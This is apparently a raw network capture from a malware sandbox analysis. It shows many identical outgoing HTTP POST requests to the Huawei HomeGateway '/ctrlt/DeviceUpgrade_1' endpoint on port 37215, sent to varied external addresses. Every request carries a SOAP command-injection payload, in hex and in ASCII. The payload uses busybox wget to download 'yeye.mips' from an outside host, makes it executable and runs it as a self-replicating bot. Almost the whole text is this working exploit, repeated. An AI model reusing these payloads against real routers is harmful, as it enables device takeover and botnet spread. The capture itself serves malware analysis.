                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2087192.168.2.1556254129.66.20.3237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.051920891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2088192.168.2.1552864197.37.111.137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.051959991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2089192.168.2.1558392197.74.213.8637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.051985025 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2090192.168.2.1541524197.207.25.17337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.052012920 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2091192.168.2.1538630197.36.193.9937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.057104111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2092192.168.2.1548594197.203.107.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.057418108 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2093192.168.2.1546614157.71.152.737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.062176943 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2094192.168.2.153722297.139.70.14137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.062196016 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2095192.168.2.1555666197.207.125.19337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.062212944 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2096192.168.2.1535288197.86.110.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.067504883 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
